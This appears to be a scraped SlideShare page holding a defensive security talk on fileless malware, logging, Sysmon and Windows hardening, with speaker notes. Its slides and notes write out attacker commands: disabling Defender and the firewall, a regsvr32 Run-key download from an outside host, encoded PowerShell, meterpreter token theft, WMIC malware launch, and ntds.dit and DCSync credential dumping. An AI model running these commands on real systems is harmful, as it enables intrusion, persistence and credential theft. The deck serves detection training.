Matjaž Lipuš
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Orkestra
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
Access Innovations, Inc.
 

Recently uploaded (13)

Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
 
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
 

Adversary tactics config mgmt-&-logs-oh-my

  • 2. > Following presentation contains my thoughts, ideas and opinions. They do not represent those of my current or past employers. > Any events, characters and company depicted in the course of this presentation are purely fictitious. Any similarity to actual events, characters and company is merely coincidental. > Do not use these tactics/techniques presented for evil. WARNING… Disclaimer
  • 3. > What you will walk away from here with? – This slide deck! – Security awareness of Fileless Malware Adversary Tactics/Techniques and Detection. – Motivation to look at OS configurations (registry/services), logs, and simulate adversaries to secure your part of the world. Security depends on US! Together We Can Defend!
  • 4. > Jesse Moore – Threat Detection and Response Team @ UW Medicine. – Certs are to many to list (lookup me up on LinkedIn) > GIAC Certified Forensics Analysts, GIAC Penetration Tester https://www.linkedin.com/in/jessefmoore/ Jessefmoore+DFIR@gmail.com Security Enablers, Just someone wanting to assist with Security! WHO Am I?
  • 5. – Security awareness of some Fileless Malware Adversary Tactics/Techniques – In Memory attacks – Empire demo – Phish with SET – Abuse Windows features – PTH Demo – CIS-CAT (Configuration Assessment Tool) demo > Awareness of defense approaches – Logging > PowerShell Script Block > CMD line audit > Sysmonv8 logging > Registry Monitoring – Motivation to secure your part of the world > CIS Hardening URL > US-Cert Advisory > Logging Cheat Sheets > References to Adversary tactics. … What is the Agenda?
  • 6. What’s that?¯_(ツ)_/¯ whoami systeminfo Qwinsta taskkill /f /im MsMpEng.exe netsh advfirewall set currentprofile state off netsh advfirewall set domainprofile state off netsh advfirewall set allprofiles state off powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl” sc.exe create "svvchost" binpath= "c:tempsvvchost.exe" sc.exe start svvchost reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "start" /d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
  • 7. > What is the biggest Risk to org? – Taken together, phishing and pretexting represent 93% of all social breaches in the study. Email was the most common attack vector (96%) … Okay, lets talk stats Verizon Data Breach Investigations Report (DBIR) Phish  Creds -> OWA -> phish other users Phish  Creds -> OWA -> Find Systems account has access Phish  Creds -> VPN -> workstation Phish  Creds -> System Access-> Mimikatz – Phish  Creds -> System Access->Empire Phish  Creds -> System Access-> Meterpreter Phish  Creds -> System Access-> BloodHound https://www.cobaltstrike.com/downloads/csmanual311.pdf
  • 9. > Configuration Best Practices Must be aware to be prepared. Being prepared… What can I do? Reference: https://learn.cisecurity.org/cis-cat-landing-page
  • 10. CIS Controls: 9 Limitation and Control of Network Ports, Protocols, and Services CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2
  • 11. > Patch Software – US-Cert Advisories: https://www.us-cert.gov/mailing-lists-and-feeds Must be aware to be prepared. Being Aware something is bad
  • 12. What even looks bad? (Adversary Tactics)
  • 13. http://www.nationalccdc.org/ Who has heard of Collegiate Cyber Defense Competition (CCDC)?
  • 16.
  • 17. https://github.com/vysec/RedTips What even looks bad? (Adversary Tactics) Check with Community GitHubs and twitter
  • 19. Mitigation Detection please? ATT&CK has them.
  • 20. > system) … Enable PowerShell Script Block logging
  • 21. …You know like PowerSploit, Nishang modules, etc Turn On PowerShell Module Logging
  • 22. > Atomic Red Team has some Adversary TTPs mapped to ATT&CK framework. Check your defenses! Bad stuff? Adversary tactic code? Atomic RedTeam
  • 23. EvntTrcngForWin C# Adversary tactic code? https://countercept.com/blog/detecting- malicious-use-of-net-part-2/
  • 28. Sysmon Turned On. Oh no.. (says attacker)
  • 29. Use BloodHound to visualize accounts that may lead to sensitive stuff leaving your organization at Risk. Token Stealing? Monitor who logs on where & when? Reference: Derivative Local Admin http://www.sixdub.net/?p=591
  • 31. > Invoke-NinjaCopy.ps1 – Copy ntds.dit database along with SYSTEM HIV – Detection: PowerShellv5 Script Block Logging > DCSync (Empire) – Detection: https://github.com/shellster/DCSYNCMonitor > Compare HaveIBeenPWND ntlm hashses with ntds.dit ntlm hashes – Detection: https://jacksonvd.com/pwned-passwords-and- ntlm-hashes/ Get the hashes What about Active Directory?
  • 32. > Monitor the Registry! – Disable Reversible Encryption – Disable LM and NTLM – Disable Credential Caching – LSA Protection Against Connection of Third-Party Modules – Disabling Wdigest – Prevent the use of saved passwords – Credential Guard (Win10 Enterprise/srvr2016) – Protected Users Security Group (Windows Server 2012 R2) – Prevent Getting Debug Privileges > disable SeDebugPrivilege. You can do it using GPO (local or domain one). Go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and enable the policy Debug Program. … Mimikatz Detections
  • 33. > Detect Cobalt Strike Beacon – https://blog.jpcert.or.jp/2018/08/volatility-plugin-for- detecting-cobalt-strike-beacon.html – SMB pipes from workstation to workstations > Detect Meterpreter – - rundll32.exe process , Poker ports, Network analysis – EDRs. Childproc_name:”rundll32.exe” AND digsig_result:”Unsigned” AND path:cwindows* – https://github.com/countercept/memory-carving-scripts … Fileless Malware Detections
  • 34. > DEMO – Fileless Malware demo: > Detect Empire in memory with PowerShell script https://screencast-o-matic.com/u/vqZ/Find_FilelessMal Empire & Get-InjectedThread to detect Perform Memory (Empire) Attack & Detection!
  • 35. > DEMO – Phish Attack (How bad can it be?) > Kali SET Phishing: https://screencast-o-matic.com/u/vqZ/Kali_SET_PhishingWebsite SET (PHISH) Attack Perform the PHISH attack!
  • 36. > Windows – Abusing Windows > https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup – https://www.youtube.com/watch?v=rjRDsXp_MNk (10:36 minutes) – https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire – https://screencast-o-matic.com/u/vqZ/CrackHashResponder > https://screencast-o-matic.com/u/vqZ/PTH-Detection Need to Monitor systems to find evidence of activities… What other attacks are there?
  • 37. > DEMO – Automatically find Secure configs > CIS-CAT: Configuration Assessment Tool. > https://screencast-o-matic.com/u/vqZ/CIS- CAT Reference: > https://learn.cisecurity.org/cis-cat-landing-page Windows Config Benchmarks for Defense! Perform OS Configuration Hardening!
  • 38. … Log-MD & Malware & Archaeology for Logs!!!
  • 40. Example of stuff in this Github Who can help in the Community? Hunt Scripts https://github.com/johnfranolich/Hunting-Scripts
  • 41. > Time > Baseline (what is normal?) > Outliers (Frequency analysis) > Hunt behavior more than signatures > Build out capabilities (identify/expose) > Research… (understand attacks and build defense) … Look for Behavior
  • 43. > Kansa (moduler) https://github.com/davehull/Kansa > GRR (Agent) https://grr-doc.readthedocs.io/ > HELK (Analytics) https://github.com/Cyb3rWard0g/HELK … Other BLUE Tools
  • 44. – Best Practices > Center for Internet Security https://www.cisecurity.org/cybersecurity- best-practices/ (disable services/ports not needed (LLMNR)) > Check what Logs you need on system https://www.imfsecurity.com/compare/ > Enable PowerShell Script Block Logging (find Evil): https://www.fireeye.com/blog/threat- research/2016/02/greater_visibilityt.html > Monitor your Registry, WMI, cmdlines, API, exe > Hunt More Behavior and some signatures – Know Thy Enemy > Mitre ATT&CK https://attack.mitre.org/wiki/ATT%26CK_Matrix > Check Defenses with repo https://redcanary.com/atomic-red-team/ > Cobalt Strike Manual for TTPs: https://www.cobaltstrike.com/downloads/csmanual311.pdf Monitor your logs, Have Secure Configurations, Patch (Or Place in a Secure Enclave) & Simulate Adversary Tactics to obtain Detection mechanisms (behaviors)… The End… until next time.
  • 45. … Yep that was a lot…

Editor's Notes

  1. Thank you for attending! We will provide this slide deck, so we may concentrate on this being more of a conversation among friends and peers. Kind of like a MeetUp Hope this arms everyone with resources to detect, and secure UW devices.
  2. https://www.cisecurity.org/ https://www.microsoft.com/en-us/msrc/technical-security-notifications https://www.us-cert.gov/mailing-lists-and-feeds https://www.malwarearchaeology.com/cheat-sheets Free Tools to Review/Monitor/Log: Sysmon, Audit logs cmd line auditing, PowerShell https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/RP_Patch_Management_S508C.pdf
  3. In_memory – Empire, CobaltStrike, Meterpreter Registry-resident – store bad scripts in registry such as Autoruns Script-based –such as vbs, powershell, Python, etc Living off the Land – Abusing Windows features such as LLMNR, or CertUtil, Psexec, WMI, PowerShell, WMIC, and .net API ¯\_(ツ)_/¯ The steps that follow assumes that the attacker has already compromised the machine… Now the attacker is moving to the installation and exploitation phase Powershell –nop –exec bypass –Enc “powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }" “ Sc = Now the attacker is going to try to establish persistence by creating a service based on the file that was downloaded (Beacon(Reverse Shell)) REG ADD: The intent is to simulate a download -To continue establishing persistence, the attacker can also add a registry entry to download a malicious program once the computer starts (Beacon again?) “fileless” is actually referring to are the techniques attackers use to avoid dropping malicious executable files on disk to Evade Detection.  Reference: https://www.barkly.com/what-are-fileless-attack-techniques
  4. Phish  Creds -> System Access-> BloodHound to map attack path https://www.cobaltstrike.com/downloads/csmanual311.pdf Page 10 for image. Cobalt strike has a gui that conveys credential snowball attack.
  5. What is CS? CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors. https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6 If you learn nothing else from me other than to check the manual and Blogs post by Raphael my time here is worth it. https://www.cobaltstrike.com/aggressor-script/index.html Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots https://github.com/bluscreenofjeff/AggressorScripts
  6. CIS-CATS installation: https://screencast-o-matic.com/watch/cFj6F7qjgf Logging: Sysmon, Audit logging, Registry Monitoring, PowerShell Script Block Logging, cmd line auditing (Log-MD and CIS has a list) OWASP 2017 has a requirement for logging now. Going a step further: Act like the adversary and create detections for Network attacks, Host attacks Living off the Land: DCOM, WMI, API, EXE attacks, Website attacks, AD attack
  7. Audit: Navigate to the UI Path articulated in the Remediation section and confirm it is set as prescribed. This group policy setting is backed by the following registry location: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient:EnableMulticast Remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Network\DNS Client\Turn off multicast name resolution Impact: In the event DNS is unavailable a system will be unable to request it from other systems on the same subnet. https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup https://screencast-o-matic.com/u/vqZ/CrackHashResponder
  8. Patch Software (WSUS, SCCM, PowerShell, etc): https://ics-cert.us-cert.gov/advisories-by-vendor Not vulnerability or Risk management: https://www.us-cert.gov/sites/default/files/resources/ncats/RVA-Sample-Report.pdf Even Twitter works for latest and greatest tactics…. SubTee and the whole SpectorOps crew.
  9. useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected. Who has played or is going next year to any CCDC competitions? On the Blue Team?
  10. The mission of the Collegiate Cyber Defense Competition (CCDC) system is to provide institutions with an information assurance or computer security curriculum a controlled, competitive environment to assess their student's depth of understanding and operational competency in managing the challenges inherent in protecting a corporate network infrastructure and business information systems. CCDC Events are designed to: Build a meaningful mechanism by which institutions of higher education may evaluate their programs Provide an educational venue in which students are able to apply the theory and practical skills they have learned in their course work Foster a spirit of teamwork, ethical behavior, and effective communication both within and across teams Create interest and awareness among participating institutions and students
  11. Need to monitor Registry and Installed Patches because adversaries are looking and leaving signs of activities. Check autoruns for startup programs. Check Hash of known files that might be backdoored with extra malious program. Think BackdoorFactory! These reg keys will basically spawn your programs, as you can see this is very dangerous because these keys are very used by viruses and Trojans. [HKEY_CLASSES_ROOT\exefile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\comfile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\batfile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\piffile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="\"%1\" %*" The key should have a value of Value "%1 %*", if this is changed to "server.exe %1 %*", the server.exe will be executed EVERYTIME an exe/pif/com/bat/hta is executed.
  12. https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 https://gist.github.com/bohops/f722f1a54d9ac1070350bdcaf2da618b Via Windows 7: https://www.youtube.com/watch?v=VytjV2kPwSg Via Task manager: https://www.youtube.com/watch?v=oPk5off3yUg Via Windows Server 2012 R2 https://www.youtube.com/watch?v=OgsoIoWmhWw
  13. This technique is in memory \\https://live.sysinternals.com/ logonsessions.exe OK enough CCDC stuff back to “What even looks bad? (Adversary Tactics)”
  14. Attackers who successfully installed such malware in a network will attempt to take control of the system within the network in the following sequence in order to collect confidential information, etc. 1. Initial investigation: Collect information of the infected machine 2. Reconnaissance: Look for information saved in the machine and remote machines within the network 3. Spread of infection: Infect the machine with other malware or try to access other machines
  15. Yes even if you don’t have central logging…
  16. What can you do? Enable Logging (even if you don’t have a central logging Windows PowerShell cheat sheet https://www.malwarearchaeology.com/cheat-sheets
  17. https://www.malwarearchaeology.com/cheat-sheets
  18. You really need to log to find Bad! How do you find them?? Advance solution is Sysmon. Download and execute code: Powershell, Wscript, mshta, rundll32, Wmic, regsvr32, MSBuild, etc. Client side attacks are very common for a foothold into network. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/T1193.md#atomic-test-1---download-spearphishing-attachment https://github.com/redcanaryco/atomic-red-team https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
  19. Detect .NET with Event Tracing for Windows (ETW) providers https://countercept.com/blog/detecting-malicious-use-of-net-part-2/ This could be used as a mechanism to discover suspicious assembly loading on a system, either in the form of legitimate assemblies being used maliciously, or potentially custom assemblies being loaded purely in memory. GhostPack Review https://youtu.be/eoh_yqLOenI https://posts.specterops.io/ghostpack-d835018c5fc4 https://github.com/GhostPack SharpUp is a C# port of various PowerUp functionality SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 SharpRoast is a C# port of various PowerView's Kerberoasting functionality SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subTee's .NET PE Loader https://astr0baby.wordpress.com/2018/07/25/ghostpack-quick-review/ Now for more Defender resources such as SANS Forensics!
  20. https://www.sans.org/security-resources/posters/ Until October something… I think 8th??? Not sure!
  21. Remote Access: RDP Map Network Shares with net use Remote Execution: PSEXEC, Schedule Tasks, Services, WMI/WMIC, PowerShell Remoting
  22. https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/attack_matrix/demo.gif https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix https://www.malwarearchaeology.com/cheat-sheets See it LIVE: https://mitre.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fraw.githubusercontent.com%2Folafhartong%2Fsysmon-modular%2Fmaster%2Fattack_matrix%2FSysmon-modular.json&scoring=false&clear_annotations=false
  23. https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix T1204 ATT&CK –Monitor the execution of and command-line arguments What about no logs things like stealing tokens?
  24. meterpreter > use incognito, meterpreter > impersonate_token CAMPUS\\Administrator, Then add more accounts, Mount file C:\Windows\system32>net use Z: \\192.168.140.137\C, Then Copy file copy "y:\Software\MALSoftware\MALClient\Installers\windows\installer\setup.exe" z:\Windows\system32\ Then run process shell wmic /node:host process call create “c:\windows\temp\malware.exe” Derivative Local Admin http://www.sixdub.net/?p=591 Abusing GPO Control https://wald0.com/?p=179 https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups Abuse: Add new local admin account. Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle). Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services Abuse: Create and configure new evil services. Policy Location: Computer Configuration\Preferences\Windows Settings\Registry Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways. Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown) Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments
  25. Here you can see how an account can be a Member of a group that has access to a computer that another account session is on that they could steal the token and get to other computers. User Sessions (where people are logged on) so we can steal password or impersonate: Andy Robbins BloodHound Session collection works: https://www.youtube.com/watch?v=q86VgM2Tafc
  26. Need to copy the ntds.dit file using vssadmin c:\windows\ntds.dit OR just use Invoke-NinjaCopy .\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination c:\test\system -verbose -computername workstationvm https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/ https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/ Then, you need the SYSTEM registry hive. Luckily, this can be directly saved, by running – reg save HKLM\SYSTEM <YOUR OUTPUT PATH HERE> Now that we’ve got both of those files, we can start extracting hashes! With the system extract and ntds.dit copy in hand, fire up PowerShell, it’s time for DSInternals! Running the following will extract the hashes in Hashcat format (necessary for the next step) – $key = Get-BootKey -SystemHivePath '<PATH TO SYSTEM HIVE HERE>' Get-ADDBAccount -All -DBPath '<PATH TO NTDIS.DIT HERE>' -BootKey $key | Format-Custom -View HashcatNT | Out-File <OUTPUT PATH HERE> -Encoding ASCII Now that we have a neat little hash extraction, we can get to comparing our users’ passwords against the Pwned Passwords dataset. https://www.troyhunt.com/pwned-passwords-now-as-ntlm-hashes/ https://github.com/thegeekkid/CompromiseCheck Because NTLM hashes aren't salted (do read the two answers there if you're wondering why), providing them in downloadable form means they can easily be used to compare to hashes within an AD environment just as they are script to compare Builds a hashmap of AD NTLM hashes/usernames and iterates through a second list of hashes checking for the existence of each entry in the AD NTLM hashmap https://github.com/DGG-IT/Match-ADHashes/ DSInternals PowerShell Module, that can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers  dump all accounts at once, but this can cause heavy (=suspicious) replication traffic: Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1 https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/ DCSync: https://adsecurity.org/?p=1729 http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
  27. http://woshub.com/defending-windows-domain-against-mimikatz-attacks/ Credential Guard, has appeared that allows to isolate and protect LSASS from unauthorized access. Ok lets move on to file-less malware detection and then demo
  28. Ok let’s look at Empire (New-object System.net.Webclient).DownloadString() DownloadString() does not download any file to the disk but it copies the content of the remote file directly to the memory of the victim machine. Agent and how Get-InjectThread finds it video
  29. This video will show Inveigh Responder and then Get-InjectedThread to detect Empire in memory that had an injected process. Defenders can use PowerShell to detect obfuscation and injected processes that Empire uses. PowerShell Empire uses a default agent string that is detectable via network monitoring. For example, an attacker might call VirtualAllocEx to allocate space for malicious code to execute, and then utilize CreateRemoteThread or another API call to execute the malicious code within another application. GetInjectedThreads will retrieve the start address of each active thread, then determine the associated section properties. If there is an observed executable running within this section, it is deemed to be injected. But keep in mind that some legitimate applications perform process injection (and you might also run across an injected thread and alert). Detect CobaltStrike: https://github.com/JPCERTCC/aa-tools Volatility
  30. Monitor Host and Network activities Referr logs in WebLogin for mal behavior Watch Network access after Phish If I was an adversary I would use your creds in OWA or VPN to get onto workstations to get a foothold and collect more data…
  31. Password Reuse (HaveIBeenPWND) Passwords that are easy to guess https://screencast-o-matic.com/u/vqZ/CrackHashResponder Go to 3:36 minutes into video https://screencast-o-matic.com/u/vqZ/LLMNR_HTTPCapture Responder running and SMBRelay running with payload and Listener for SMBRelayPayload to launch Meterpreter (1:03 Minutes in). https://g-laurent.blogspot.com/2017/03/multirelay-20-runas-pivot-svc-and.html?m=1 https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire <and see all the modules in Empire and the Agents. Exploiting Windows network with Responder and MultiRelay: https://www.youtube.com/watch?v=rjRDsXp_MNk
  32. https://www.malwarearchaeology.com/cheat-sheets Log-MD https://www.imfsecurity.com/
  33. https://www.sans.org/summit-archives/file/summit-archive-1536351477.pdf
  34. Scripts are great for signatures how about behaviors?
  35. DetectionLab to perform attacks and build defenses
  36. https://medium.com/@clong/introducing-detection-lab-61db34bed6ae Other Blue Team Tools are… GRR, Kansa, HELK Or just build a noSQL db and dump everything into it and have a data scientist build queries/db
  37. Mandiant MIR, etc
  38. Turn off LLMNR to stop Responder attack
  39. Free Tools to Review/Monitor/Log: MSFT Sysinternals: Sysmon, built-in Windows Audit logs, cmd line auditing, and PowerShell, Registry Monitoring (turn on) My Wiki: https://wiki.cac.washington.edu/display/~moorej1@washington.edu/IR+Sandbox+Powershell+Obfuscation+and+Detection+Techniques PowerShell v5 Security Enhancements & AD Security https://adsecurity.org/?p=2277 Ask your vendor for best practices or free tools that come with contract such as ATP BloodHound Map AD https://github.com/BloodHoundAD/BloodHound MSFT cloud https://cloudblogs.microsoft.com/microsoftsecure/2018/08/13/cybersecurity-threats-how-to-discover-remediate-and-mitigate/ https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4 RegMon: http://leelusoft.altervista.org/registry-live-watch.html https://sourceforge.net/projects/regshot/ Team should have a mission and plan to guide them what is important to business. Could implement CyberSecurity Framework, Or Map the CIS Controls (core of NIST) to objectives. Map those to Tickets to track events related to controls for later analysis. Cybersecurity Framework (CSF) Core: Identify, Protect, Detect, Respond, Recover    For an example of Detection Response team mappings:    Protect: CIS 3, Secure Configuration of End-User Devices  Detect: CIS 4, Continuus Vulnerability Assessment & Remediation  Respond: CIS 6, Maintenance, Monitoring, and Analysis of Audit Logs
  40. Any questions?